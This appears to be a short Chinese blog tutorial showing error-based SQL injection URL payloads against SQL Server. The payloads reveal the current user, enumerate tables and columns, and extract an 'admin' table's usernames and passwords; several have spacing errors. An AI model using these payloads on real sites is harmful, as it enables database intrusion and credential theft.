欢迎来到【血梦博客】 今天是:2020年08月09日 星期日
站长联系QQ:635948183
当前位置: 网站首页> 渗透测试> WEB安全之SQL注入:sqlserver 快速爆表、爆列、爆数据

WEB安全之SQL注入:sqlserver 快速爆表、爆列、爆数据

作者:血梦 日期:2020-03-18 浏览:110分类: 渗透测试 已提交百度收录

SQL_SERVER 中每个数据库中都有 视图->系统视图


在这个下面都有很多关于这个库的表,表里面存放了很多关于这个库的信息。


COLUMNS 列


TABLES 表


1.jpg

1、查询当前用户



http://www.demo1.com/index.aspx?id=1 anduser_name()>1

2、根据当前用户爆出所有表


http://www.demo1.com/index.aspx?id=1and(select TABLE_NAME  from  information_schema.TABLES   where TABLE_SCHEMA='dbo' FOR XML PATH)>1



3、爆出所有的列

http://www.demo1.com/index.aspx?id=1and(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='admin'FOR XML PATH)>1




4、爆出数据


http://www.demo1.com/index.aspx?id=1and  ( select username,password fromadmin FOR XML PATH)>1

3.jpg

关灯